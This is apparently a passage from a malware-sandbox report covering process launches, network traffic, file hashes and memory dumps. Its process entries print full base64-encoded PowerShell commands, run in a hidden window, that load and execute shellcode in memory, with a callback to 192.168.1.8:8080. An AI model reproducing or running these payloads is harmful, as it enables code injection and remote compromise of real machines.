AIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABjAEYAUwAgACQAZQAiADsAfQA=
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -window hidden -EncodedCommand JAA3AHkAVwB4ACAAPQAgACcAJABNAGcAUwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABNAGcAUwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGUALAAwAHgAOQA3ACwAMAB4ADYAMgAsADAAeAAyADgALAAwAHgAYwA1ACwAMAB4AGQAYgAsADAAeABkAGUALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAzADEALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADcAMAAsADAAeAAxADIALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMAAzACwAMAB4AGUANwAsADAAeAA2AGMALAAwAHgAYwBhACwAMAB4ADMAMAAsADAAeABmAGIALAAwAHgAOQA5ACwAMAB4ADgANQAsADAAeABiAGIALAAwAHgAMAAzACwAMAB4ADUAYQAsADAAeABmAGEALAAwAHgAOABhACwAMAB4AGQAMQAsADAAeAAzAGUALAAwAHgANwAxACwAMAB4AGIAZQAsADAAeABlADUALAAwAHgAMwA3ACwAMAB4ADYAMAAsADAAeABiADQALAAwAHgANQA3ACwAMAB4ADQANAAsADAAeABlADAALAAwAHgAOQA5ACwAMAB4ADQAMwAsADAAeAA2ADUALAAwAHgAMAA5ACwAMAB4ADkANgAsADAAeAAxADkALAAwAHgAYQBkACwAMAB4AGYAYQAsADAAeAAxAGUALAAwAHgAOQA3ACwAMAB4ADgAYgAsADAAeAAzADUALAAwAHgAYQAxACwAMAB4ADgAYgAsADAAeABlADgALAAwAHgANQA0ACwAMAB4ADUAZAAsADAAeABkADEALAAwAHgAMwBjACwAMAB4AGIANwAsADAAeAA1AGMALAAwAHgAMQBhACwAMAB4ADMAMQAsADAAeABiADYALAAwAHgAOQA5ACwAMAB4AGUAZAAsADAAeAAzAGYALAAwAHgANQA3ACwAMAB4ADcANwAsADAAeAA2ADYALAAwAHgAZQBkACwAMAB4AGIANwAsADAAeABmADMALAAwAHgAMwBhACwAMAB4ADIAZQAsADAAeABlAGYALAAwAHgAMAAyACwAMAB4ADYAYQAsADAAeABjADUALAAwAHgANABmACwAMAB4ADcAZAAsADAAeAAwAGYALAAwAHgAMQBhACwAMAB4ADMAYgAsADAAeAAzADEALAAwAHgAMABlACwAMAB4ADQAYgAsADAAeAA5ADQALAAwAHgANAAyACwAMAB4ADQAOAAsADAAeAA0AGIALAAwAHgAMQA0ACwAMAB4ADgANgAsADAAeABlADMALAAwAHgAYwAzACwAMAB4ADAAZQAsADAAeABhAGQALAAwAHgAMwBhACwAMAB4AGEANwAsADAAeAAxADIALAAwAHgAOQBjACwAMAB4ADQAMwAsADAAeAAwADEALAAwAHgAZQAwACwAMAB4AGUAYQAsADAAeAAzADAALAAwAHgAOQAzACwAMAB4ADIAMAAsADAAeAAyADMALAAwAHgAOAA2ACwAMAB4ADUANQAsADAAeAAwADMALAAwAHgANAA5ACwAMAB4AGEAYQAsADAAeAA1ADcALAAwAHgANQBiACwAMAB4ADYAYQAsADAAeAA1ADIALAAwAHgAMgAyACwAMAB4ADkANwAsADAAeAA4ADgALAAwAHgAZQBmACwAMAB4ADMANQAsADAAeAA2AGMALAAwAHgAZgAyACwAMAB4ADIAYgAsADAAeABiADMALAAwAHgANwAzACwAMAB4ADUANAAsADAAeABiADgALAAwAHgANgAzACwAMAB4ADUAMAAsADAAeAA2ADQALAAwAHgANgBkACwAMAB4AGYANQAsADAAeAAxADMALAAwAHgANgBhACwAMAB4AGQAYQAsADAAeAA3ADEALAAwAHgANwBiACwAMAB4ADYAZgAsADAAeABkAGQALAAwAHgANQA2ACwAMAB4AGYANwAsADAAeAA4AGIALAAwAHgANQA2ACwAMAB4ADUAOQAsADAAeABkADgALAAwAHgAMQBkACwAMAB4ADIAYwAsADAAeAA3AGUALAAwAHgAZgBjACwAMAB4ADQANgAsADAAeABmADcALAAwAHgAMQBmACwAMAB4AGEANQAsADAAeAAyADIALAAwAHgANQA2ACwAMAB4ADEAZgAsADAAeABiADUALAAwAHgAOABiACwAMAB4ADAANwAsADAAeAA4ADUALAAwAHgAYgBkACwAMAB4ADMAZQAsADAAeAA1AGUALAAwAHgAYgA5ACwAMAB4ADMAZAAsADAAeABjADEALAAwAHgANQBmACwAMAB4AGUANwAsADAAeABhADkALAAwAHgAMABkACwAMAB4AGEAZAAsADAAeAAxADgALAAwAHgAMgBhACwAMAB4ADEAYQAsADAAeABhADYALAAwAHgANgBiACwAMAB4ADEAOAAsADAAeAA4ADUALAAwAHgAMQBjACwAMAB4AGUANAAsADAAeAAxADAALAAwAHgANABlACwAMAB4AGIAYQAsADAAeABmADMALAAwAHgAMgAxACwAMAB4ADUAOAAsADAAeAAzAGQALAAwAHgAMgBiACwAMAB4ADgAOQAsADAAeAAwADkALAAwAHgAYwAwACwAMAB4AGMAYwAsADAAeABlAGEALAAwAHgAMAAwACwAMAB4ADAANgAsADAAeAA5ADgALAAwAHgAYgBhACwAMAB4ADMAYQAsADAAeABhAGYALAAwAHgAYQAxACwAMAB4ADUAMAAsADAAeABiAGIALAAwAHgANQAwACwAMAB4ADcANAAsADAAeABjAGMALAAwAHgAYgAxACwAMAB4AGMANgAsADAAeABiADcALAAwAHgAYgA5ACwAMAB4AGMANwAsADAAeAAxAGUALAAwAHgANQAwACwAMAB4AGIAOAAsADAAeABjADcALAAwAHgAMAAxACwAMAB4ADMAMAAsADAAeAAzADUALAAwAHgAMgAxACwAMAB4ADYAZAAsADAAeAA2ADAALAAwAHgAMQA2ACwAMAB4AGYAZQAsADAAeABjAGQALAAwAHgAZAAwACwAMAB4AGQANgAsADAAeABhAGUALAAwAHgAYQA1ACwAMAB4ADMAYQAsADAAeABkADkALAAwAHgAOQAxACwAMAB4AGQANQAsADAAeAA0ADQALAAwAHgAMwAzACwAMAB4AGIAYQAsADAAeAA3AGYALAAwAHgAYQBiACwAMAB4AGUAYQAsADAAeAA5ADIALAAwAHgAMQA3ACwAMAB4ADUAMgAsADAAeABiADcALAAwAHgANgA5ACwAMAB4ADgANgAsADAAeAA5AGIALAAwAHgANgBkACwAMAB4ADEANAAsADAAeAA4ADgALAAwAHgAMQAwACwAMAB4ADgAMgAsADAAeABlADgALAAwAHgANAA2ACwAMAB4AGQAMQAsADAAeABlAGYALAAwAHgAZgBhACwAMAB4ADMAZQAsADAAeAAxADEALAAwAHgAYgBhACwAMAB4AGEAMQAsADAAeABlADgALAAwAHgAMgBlACwAMAB4ADEAMAAsADAAeABjAGYALAAwAHgAMQA0ACwAMAB4AGIAYgAsADAAeAA5AGYALAAwAHgANAA2ACwAMAB4ADQAMwAsADAAeAA1ADMALAAwAHgAYQAyACwAMAB4AGIAZgAsADAAeABhADMALAAwAHgAZgBjACwAMAB4ADUAZAAsADAAeABlAGEALAAwAHgAYgA4ACwAMAB4ADMANQAsADAAeABjADgALAAwAHgANQA1ACwAMAB4AGQANgAsADAAeAAzADkALAAwAHgAMQBjACwAMAB4ADUANgAsADAAeAAyADYALAAwAHgANgBjACwAMAB4ADcANgAsADAAeAA1ADYALAAwAHgANABlACwAMAB4AGMAOAAsADAAeAAyADIALAAwAHgAMAA1ACwAMAB4ADYAYgAsADAAeAAxADcALAAwAHgAZgBmACwAMAB4ADMAOQAsADAAeAAyADAALAAwAHgAOAAyACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgAOQA1ACwAMAB4ADAANQAsADAAeAA2ADkALAAwAHgAOQA2ACwAMAB4AGMAMAAsADAAeAA2ADIALAAwAHgAMwA2ACwAMAB4ADYAOQAsADAAeAAyADcALAAwAHgANwAzACwAMAB4ADAAYQAsADAAeABiAGMALAAwAHgAMAAxACwAMAB4ADAAMQAsADAAeAA2ADIALAAwAHgANwBjADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABBAEIAVAB1AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABBAEIAVAB1AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABBAEIAVAB1ACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQANwB5AFcAeAApACkAOwAkAGMARgBTACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAQwBnAFYAegAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABDAGcAVgB6ACAAJABjAEYAUwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABjAEYAUwAgACQAZQAiADsAfQA=
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABNAGcAUwAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAE0AZwBTACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAA5ADcALAAwAHgANgAyACwAMAB4ADIAOAAsADAAeABjADUALAAwAHgAZABiACwAMAB4AGQAZQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEAMgAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAwADMALAAwAHgAZQA3ACwAMAB4ADYAYwAsADAAeABjAGEALAAwAHgAMwAwACwAMAB4AGYAYgAsADAAeAA5ADkALAAwAHgAOAA1ACwAMAB4AGIAYgAsADAAeAAwADMALAAwAHgANQBhACwAMAB4AGYAYQAsADAAeAA4AGEALAAwAHgAZAAxACwAMAB4ADMAZQAsADAAeAA3ADEALAAwAHgAYgBlACwAMAB4AGUANQAsADAAeAAzADcALAAwAHgANgAwACwAMAB4AGIANAAsADAAeAA1ADcALAAwAHgANAA0ACwAMAB4AGUAMAAsADAAeAA5ADkALAAwAHgANAAzACwAMAB4ADYANQAsADAAeAAwADkALAAwAHgAOQA2ACwAMAB4ADEAOQAsADAAeABhAGQALAAwAHgAZgBhACwAMAB4ADEAZQAsADAAeAA5ADcALAAwAHgAOABiACwAMAB4ADMANQAsADAAeABhADEALAAwAHgAOABiACwAMAB4AGUAOAAsADAAeAA1ADQALAAwAHgANQBkACwAMAB4AGQAMQAsADAAeAAzAGMALAAwAHgAYgA3ACwAMAB4ADUAYwAsADAAeAAxAGEALAAwAHgAMwAxACwAMAB4AGIANgAsADAAeAA5ADkALAAwAHgAZQBkACwAMAB4ADMAZgAsADAAeAA1ADcALAAwAHgANwA3ACwAMAB4ADYANgAsADAAeABlAGQALAAwAHgAYgA3ACwAMAB4AGYAMwAsADAAeAAzAGEALAAwAHgAMgBlACwAMAB4AGUAZgAsADAAeAAwADIALAAwAHgANgBhACwAMAB4AGMANQAsADAAeAA0AGYALAAwAHgANwBkACwAMAB4ADAAZgAsADAAeAAxAGEALAAwAHgAMwBiACwAMAB4ADMAMQAsADAAeAAwAGUALAAwAHgANABiACwAMAB4ADkANAAsADAAeAA0ADIALAAwAHgANAA4ACwAMAB4ADQAYgAsADAAeAAxADQALAAwAHgAOAA2ACwAMAB4AGUAMwAsADAAeABjADMALAAwAHgAMABlACwAMAB4AGEAZAAsADAAeAAzAGEALAAwAHgAYQA3ACwAMAB4ADEAMgAsADAAeAA5AGMALAAwAHgANAAzACwAMAB4ADAAMQAsADAAeABlADAALAAwAHgAZQBhACwAMAB4ADMAMAAsADAAeAA5ADMALAAwAHgAMgAwACwAMAB4ADIAMwAsADAAeAA4ADYALAAwAHgANQA1ACwAMAB4ADAAMwAsADAAeAA0ADkALAAwAHgAYQBhACwAMAB4ADUANwAsADAAeAA1AGIALAAwAHgANgBhACwAMAB4ADUAMgAsADAAeAAyADIALAAwAHgAOQA3ACwAMAB4ADgAOAAsADAAeABlAGYALAAwAHgAMwA1ACwAMAB4ADYAYwAsADAAeABmADIALAAwAHgAMgBiACwAMAB4AGIAMwAsADAAeAA3ADMALAAwAHgANQA0ACwAMAB4AGIAOAAsADAAeAA2ADMALAAwAHgANQAwACwAMAB4ADYANAAsADAAeAA2AGQALAAwAHgAZgA1ACwAMAB4ADEAMwAsADAAeAA2AGEALAAwAHgAZABhACwAMAB4ADcAMQAsADAAeAA3AGIALAAwAHgANgBmACwAMAB4AGQAZAAsADAAeAA1ADYALAAwAHgAZgA3ACwAMAB4ADgAYgAsADAAeAA1ADYALAAwAHgANQA5ACwAMAB4AGQAOAAsADAAeAAxAGQALAAwAHgAMgBjACwAMAB4ADcAZQAsADAAeABmAGMALAAwAHgANAA2ACwAMAB4AGYANwAsADAAeAAxAGYALAAwAHgAYQA1ACwAMAB4ADIAMgAsADAAeAA1ADYALAAwAHgAMQBmACwAMAB4AGIANQAsADAAeAA4AGIALAAwAHgAMAA3ACwAMAB4ADgANQAsADAAeABiAGQALAAwAHgAMwBlACwAMAB4ADUAZQAsADAAeABiADkALAAwAHgAMwBkACwAMAB4AGMAMQAsADAAeAA1AGYALAAwAHgAZQA3ACwAMAB4AGEAOQAsADAAeAAwAGQALAAwAHgAYQBkACwAMAB4ADEAOAAsADAAeAAyAGEALAAwAHgAMQBhACwAMAB4AGEANgAsADAAeAA2AGIALAAwAHgAMQA4ACwAMAB4ADgANQAsADAAeAAxAGMALAAwAHgAZQA0ACwAMAB4ADEAMAAsADAAeAA0AGUALAAwAHgAYgBhACwAMAB4AGYAMwAsADAAeAAyADEALAAwAHgANQA4ACwAMAB4ADMAZAAsADAAeAAyAGIALAAwAHgAOAA5ACwAMAB4ADAAOQAsADAAeABjADAALAAwAHgAYwBjACwAMAB4AGUAYQAsADAAeAAwADAALAAwAHgAMAA2ACwAMAB4ADkAOAAsADAAeABiAGEALAAwAHgAMwBhACwAMAB4AGEAZgAsADAAeABhADEALAAwAHgANQAwACwAMAB4AGIAYgAsADAAeAA1ADAALAAwAHgANwA0ACwAMAB4AGMAYwAsADAAeABiADEALAAwAHgAYwA2ACwAMAB4AGIANwAsADAAeABiADkALAAwAHgAYwA3ACwAMAB4ADEAZQAsADAAeAA1ADAALAAwAHgAYgA4ACwAMAB4AGMANwAsADAAeAAwADEALAAwAHgAMwAwACwAMAB4ADMANQAsADAAeAAyADEALAAwAHgANgBkACwAMAB4ADYAMAAsADAAeAAxADYALAAwAHgAZgBlACwAMAB4AGMAZAAsADAAeABkADAALAAwAHgAZAA2ACwAMAB4AGEAZQAsADAAeABhADUALAAwAHgAMwBhACwAMAB4AGQAOQAsADAAeAA5ADEALAAwAHgAZAA1ACwAMAB4ADQANAAsADAAeAAzADMALAAwAHgAYgBhACwAMAB4ADcAZgAsADAAeABhAGIALAAwAHgAZQBhACwAMAB4ADkAMgAsADAAeAAxADcALAAwAHgANQAyACwAMAB4AGIANwAsADAAeAA2ADkALAAwAHgAOAA2ACwAMAB4ADkAYgAsADAAeAA2AGQALAAwAHgAMQA0ACwAMAB4ADgAOAAsADAAeAAxADAALAAwAHgAOAAyACwAMAB4AGUAOAAsADAAeAA0ADYALAAwAHgAZAAxACwAMAB4AGUAZgAsADAAeABmAGEALAAwAHgAMwBlACwAMAB4ADEAMQAsADAAeABiAGEALAAwAHgAYQAxACwAMAB4AGUAOAAsADAAeAAyAGUALAAwAHgAMQAwACwAMAB4AGMAZgAsADAAeAAxADQALAAwAHgAYgBiACwAMAB4ADkAZgAsADAAeAA0ADYALAAwAHgANAAzACwAMAB4ADUAMwAsADAAeABhADIALAAwAHgAYgBmACwAMAB4AGEAMwAsADAAeABmAGMALAAwAHgANQBkACwAMAB4AGUAYQAsADAAeABiADgALAAwAHgAMwA1ACwAMAB4AGMAOAAsADAAeAA1ADUALAAwAHgAZAA2ACwAMAB4ADMAOQAsADAAeAAxAGMALAAwAHgANQA2ACwAMAB4ADIANgAsADAAeAA2AGMALAAwAHgANwA2ACwAMAB4ADUANgAsADAAeAA0AGUALAAwAHgAYwA4ACwAMAB4ADIAMgAsADAAeAAwADUALAAwAHgANgBiACwAMAB4ADEANwAsADAAeABmAGYALAAwAHgAMwA5ACwAMAB4ADIAMAAsADAAeAA4ADIALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA5ADUALAAwAHgAMAA1ACwAMAB4ADYAOQAsADAAeAA5ADYALAAwAHgAYwAwACwAMAB4ADYAMgAsADAAeAAzADYALAAwAHgANgA5ACwAMAB4ADIANwAsADAAeAA3ADMALAAwAHgAMABhACwAMAB4AGIAYwAsADAAeAAwADEALAAwAHgAMAAxACwAMAB4ADYAMgAsADAAeAA3AGMAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEEAQgBUAHUAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEEAQgBUAHUALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEEAQgBUAHUALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xstaiujp\xstaiujp.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES421A.tmp" "c:\Users\Admin\AppData\Local\Temp\xstaiujp\CSC1E2C45E74E1F4F0B976E67B55DED858.TMP"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.32.209.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| N/A | 192.168.1.8:8080 | tcp | |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
Files
memory/2028-0-0x0000000000480000-0x000000000048A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xpiu0x5k.1vs.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2560-11-0x000001D2E5C10000-0x000001D2E5C32000-memory.dmp
memory/2028-6-0x00007FFEB5DC0000-0x00007FFEB6881000-memory.dmp
memory/2560-12-0x000001D2FE350000-0x000001D2FE360000-memory.dmp
memory/2560-13-0x00007FFEB5DC0000-0x00007FFEB6881000-memory.dmp
memory/2044-14-0x00000000744D0000-0x0000000074C80000-memory.dmp
memory/2044-15-0x0000000004CE0000-0x0000000004CF0000-memory.dmp
memory/2044-16-0x0000000004D30000-0x0000000004D66000-memory.dmp
memory/2044-17-0x0000000004CE0000-0x0000000004CF0000-memory.dmp
memory/2044-18-0x00000000053A0000-0x00000000059C8000-memory.dmp
memory/2044-19-0x0000000005320000-0x0000000005342000-memory.dmp
memory/2044-20-0x0000000005B40000-0x0000000005BA6000-memory.dmp
memory/2044-21-0x0000000005C20000-0x0000000005C86000-memory.dmp
memory/2044-31-0x0000000005DD0000-0x0000000006124000-memory.dmp
memory/2044-32-0x00000000062D0000-0x00000000062EE000-memory.dmp
memory/2044-33-0x0000000006310000-0x000000000635C000-memory.dmp
memory/2044-34-0x0000000007B20000-0x000000000819A000-memory.dmp
memory/2044-35-0x0000000006800000-0x000000000681A000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\xstaiujp\xstaiujp.cmdline
| MD5 | ca26538a1bd0155e961ad9499ae7df44 |
| SHA1 | 7838e6c383373ca346bc74c53616abac847dd96e |
| SHA256 | 9aced52680c94f0adfc8980fe01859dda1c8dfa916b09b416cd18010294126d0 |
| SHA512 | 4698eec2df32c7016857cf6556753a76ccd18a4fc465d0c4efe6ab7c781f1367de327c3f6db8d6109b271148d4fc0b71eba0350dd87b631183b48ed1ab477e11 |
\??\c:\Users\Admin\AppData\Local\Temp\xstaiujp\xstaiujp.0.cs
| MD5 | 7319070c34daa5f6f2ece2dfc07119ee |
| SHA1 | f26a4a48518a5608e93c8b77368f588b0433973c |
| SHA256 | b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc |
